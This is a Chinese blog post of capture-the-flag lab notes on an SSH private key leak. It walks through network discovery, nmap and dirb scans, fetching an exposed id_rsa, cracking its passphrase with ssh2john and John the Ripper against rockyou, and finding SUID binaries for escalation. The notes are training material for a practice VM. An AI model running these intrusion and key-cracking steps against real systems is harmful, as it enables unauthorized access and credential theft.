[ CTF ] ssh私钥泄漏_笔记

最新推荐文章于 2024-03-16 16:49:24 发布
最新推荐文章于 2024-03-16 16:49:24 发布
阅读量520 收藏
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40636259/article/details/99621003
版权

探测靶场IP{
netdiscover -r ip/netmask;
netdiscover -r 192.168.31.0/24;
192.168.31.97 08:00:27:e2:b8:c0 1 60 PCS Systemtechnik GmbH;
192.168.31.173 08:00:27:3d:18:b2 2 84 PCS Systemtechnik GmbH;
192.168.31.228 08:00:27:c1:98:fe 2 84 PCS Systemtechnik GmbH;
网络联通性检测:
ping;
均能 ping 通;
}

信息探测{
nmap -sV 192.168.31.97;
观察结果中存在这一行:
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3);
针对特殊端口进行探测,尤其对开放大端口的http服务进行排查;
可以使用浏览器:
http://192.168.31.97:31337/;
查看源代码进行更深入的信息;
使用 dirb 探测隐藏文件:
dirb http://192.168.31.97:31337/;
发现了 robots.txt 查看不允许搜索引擎探测的文件及信息{
发现 http://192.168.31.97:31337/taxes;
获得第一个flag!!!:
flag1{make_america_great_again};
}
}

ssh{
详见:https://blog.csdn.net/csm201314/article/details/78453579;
登录到远程服务器;
验证方式:
id_rsa: 私钥;
id_rsa.pub: 公钥;
思考:是否存在/id_rsa文件:
http://192.168.31.97:31337/.ssh/id_rsa;
chmod 600 id_rsa;
ssh -i id_rsa simon@192.168.31.97;
解密ssh私钥信息{
使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息;
chmod 600 id_rsa;
ssh2john id_rsa > isacrack{
ssh2john本身并不是kali自带的程序,可以在github上进行下载;
https://github.com/magnumripper/JohnTheRipper/;
}
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules isacrack;
获得password: starwars;
登录后:
ls
并没有发现flags文件;
cd /root;
cat read_message.c;
获得第二个flag: flag2{use_the_source_luke};
find / -perm -4000 2>/dev/null //避免错误输出;
观察read_message.c,又发现存在具有root权限的可执行文件read_message;
利用缓冲区溢出,获得flag值: flag3{das_bof_meister};
}
}
在这里插入图片描述

inv@1id
关注
专栏目录
SSH服务的渗透测试
小锤队长的博客
10-05 3437
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1964
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
第十课、frida环境搭建与使用
qq_37314468的博客
03-11 1542
修改名字与端口查看端口的命令默认的是27042开启自定义端口listen在虚拟机上命令查看进程attach前台程序objection使用dpkg -i dwada.deb 安装deb格式软件vscode使用脚本frida -H 192.168.31.97:8787 -F -l _agent.js 这个ip地址是要写手机的ip地址r。
PyCharm中如何使用不同的虚拟环境
最新发布
PleaseBeStrong的博客
03-16 779
有些项目用老的运行环境,而有些项目用新的运行环境,那么我们在运行这些代码(比如跑对比实验的时候)如何进行切换呢,这时候就可以使用虚拟环境啦。
axios 简单常用笔记
weixin_34258782的博客
10-21 128
简单认知: 1、config.data是POST参数,config.params是GET参数     axios(url, [config]) + qs + application/x-www-form-urlencoded https://github.com/axios/axios#axioscreateconfig <!DOCTYPE html> <html lang="...
CTF-SSH私钥泄露代码详细解说
weixin_45441727的博客
02-26 794
nmap -sV 172.16.101.61 扫描靶机的端口以及开启服务 若发现 31337/tcp open http Werkzeug httpd 0.11.15 (pYTHON 3.5.3) 特殊端口31337端口服务开启 此时我们可以探测大端口的信息 可以通过http://ip:port的形式访问靶机,查看其源代码 另外,还可以通过使用工具来探测隐藏页面 -dirb http://ip:port/ 一般来讲探测之后会发现很多隐藏文件,那么我们可以通过他们来进一步进行渗透。 讲解一下: 如果发现了以
CTF练习:SSH私钥泄露
qq_43233085的博客
11-09 2870
Kotlin学习3.2:函数的分类环境准备靶机寻找信息探测SSH私钥泄露SSH私钥破解靶机提权 SSH——私钥泄露,如何从外部进入最终获得root主机。 靶机地址: 链接:https://pan.baidu.com/s/1aUpy0ayJEhcdboFsrIi0OQ 提取码:0loe 环境准备 开启两台机器,一台靶机一台kali攻击机 两台设置同样的网络模式 靶机寻找 kali登陆,ifcon...
CTF训练笔记(二)- SSH渗透root主机
morrino的博客
01-10 3333
在对SSH服务的渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶机,偶尔可能还需要暴力破解密码。 CTF中要特别注意: /tmp 数据缓存目录; /etc/crontab 定时任务文件。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF训练笔记(三)- SMB信息泄露
morrino的博客
02-05 1705
大量搜索各种信息,尝试利用各种途径拿到shell进而提权。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
我要偷偷渗透,然后卷死所有人之(SSH私钥泄露)
qq_20765511的博客
02-27 660
今天开始学SSH私钥泄露 上一篇文章就说到怎么找到靶机的IP,现在知道靶机IP之后,就要去找这个靶机的信息了 我这个靶机是SSH私钥泄露的,有人想要或者感兴趣的话,可以私信我找我拿 一般渗透流程一开始都是信息收集 先使用: nmap -sV IP #挖掘开放的服务信息 我这IP是192.168.43.189 也就是 nmap -sV 192.168.43.189 记住一点是要进入root模式 就得到了这个靶机开放的信息,其中就看到了开放了SSH端口 ...
ctf训练 ssh私钥泄露
MIGENGKING的博客
06-02 1738
1-2 环境搭建 ssh私钥泄露是要在VM虚拟机中进行的。首先安装好VM虚拟机(我的另一个博客详细介绍VM的安装) (1)打开虚拟机和打开ssh私钥泄露靶场 并且本虚拟机和靶场的网络连接都要相同 (2)接下来打开本虚拟机的终端,并找到自己虚拟机的IP(是虚拟机的IP地址)在终端上输入“ifconfig”这个是找虚拟机的ip地址代码,然后找到自己虚拟机的IP地址,如图: (3)接下来我们使用...
JTR(John The Ripper)的ssh密钥破解记录
qq_40490088的博客
07-30 1945
JTR破解ssh密钥,需要将密钥这种类型文件转换为JTR兼容的攻击文件。 所以,需要找到相关工具来转换,在网上搜到的相关工具为ssh2john,在/usr/sbin/目录下,但是我查看了我的对应路径,并没有这个文件 于是输入locate ssh2john查看在哪个目录下 找到了,现在可以执行这个python文件进行转换了。 因为id_rsa文件在桌面,所以目录转到桌面,再进行转换。 此时,回到...
CTF 2019-7-26 笔记
weixin_40328085的博客
07-27 297
第一步, nmap -sV 192.168.0.1 扫描 服务信息 找到已经打开的端口。 第二步, 浏览器 192.168.0.1:31337 探看页面源代码。 找到可能的隐藏的文件。 第三步,探测端口信息 dirb http://192.168.0.1:31337/ 别忘了最后的"/" 可以探测到隐藏...
CTF训练 SSH服务(1)
weixin_43803070的博客
07-05 1213
** 一、探测靶场地址 探测之前要注意攻击机的网络连接模式是桥接模式 ** root@kali:~# netdiscover -r 192.168.1.1/24 ** 二、测试主机与靶场的连通性 ** root@kali:~# ping 以上证明两个机器之间已经联通,之后我们进行实验。 ** 三、端口扫描 ** root@kali:~# nmap -sV 192.168.1.107 ...
CTF-SSH私钥泄露
qq_39056867的博客
10-18 1128
CTF-SSH私密泄露 实验环境 运行在Oracle VM VirtulBox上的靶场:192.168.88.142 Kali攻击机:192.168.88.143 实验内容 对于只是给定一个对应IP地址的靶场机器,我们需要用对其进行扫描,探测开放的服务,使用命令nmap -sV IP对靶机进行扫描,探测开放的服务: ...
CTF实验:ssh泄露
floyd_art的博客
12-04 429
CTF实验:ssh泄露 信息收集 两台虚拟机均为桥接,一台kali一台ssh私钥泄露主机。在kali中输入ifconfig查看网段 在输入netdiscover 192.168.43.1/24 查询网段主机 ping 192.168.43.134 发现ping通,那么用nmap探测该ip 对网页的分析 探测后发现端口号为31337比较可疑,所以在浏览器中输入http://192.168.43...
CTF训练之现学现卖--SSH私钥泄露
zoleo8088的博客
06-08 1590
【原创】CTF训练之现学现卖–SSH私钥泄露 Step1 环境搭建: KALI官网下载vmware虚拟机 Virtual PC加载SSH-私钥泄露.ova (链接:https://pan.baidu.com/s/1dZzfdiWTU1XtI5bqocNosQ 提取码:45n0 ) 搭建局域网络,使vmware和vpc互通,在同一个子网 我在vmware下配置双网卡,eth0通过nat连向外部网络,...
ssh私钥泄露
Vinson的博客
09-22 1682
目录 环境搭建 查看当前ip地址 ifconfig 探测靶场 netdiscover -r ip/netmask子网掩码 测试靶场连通性 ssh私钥泄露 信息探测 -nmap -sV 192.168.100.107 挖掘开放服务信息 端口探测 Robots协议 SSH 为建立在应用层基础上的安全协议 解密ssh私钥信息--破解密码登陆 利用字典解密isacrack信息...
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值